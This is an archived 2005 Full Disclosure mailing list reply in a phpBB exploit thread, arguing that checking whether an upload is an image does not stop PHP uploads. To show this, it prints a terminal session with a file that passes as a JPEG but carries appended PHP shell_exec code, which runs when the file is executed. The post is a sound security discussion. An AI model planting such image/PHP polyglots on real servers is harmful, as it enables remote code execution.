Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

Re: phpBB 2.0.17 (and other BB systems as well) Cookie disclosure exploit.
From: Nicob <nicob () nicob net>
Date: Thu, 27 Oct 2005 15:23:12 +0200

Le mardi 25 octobre 2005 à 17:02 -0400, Paul Laudanski a écrit :

Anyone have other ideas on this?  I've already implemented some code
to validate file input and its working.  But is this the right
approach?

I'm not sure to understand what you're talking about but if you're
trying to positively validate that file XYZ is an image and not a PHP
file, you're asking for trouble :

$> wget http://nicob.net/mirrors/blowjob.jpg

$> file blowjob.jpg 
blowjob.jpg: JPEG image data, JFIF standard 1.0

$> tail -n 5 blowjob.jpg
<?php
$resu = shell_exec("echo '' && echo '' && uname -a && id && date");
echo nl2br($resu);
?>

$> php blowjob.jpg
[garbage] Linux dellyre 2.6.[...] jeu oct 27 15:21:31 CEST 2005 [...]


Nicob

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault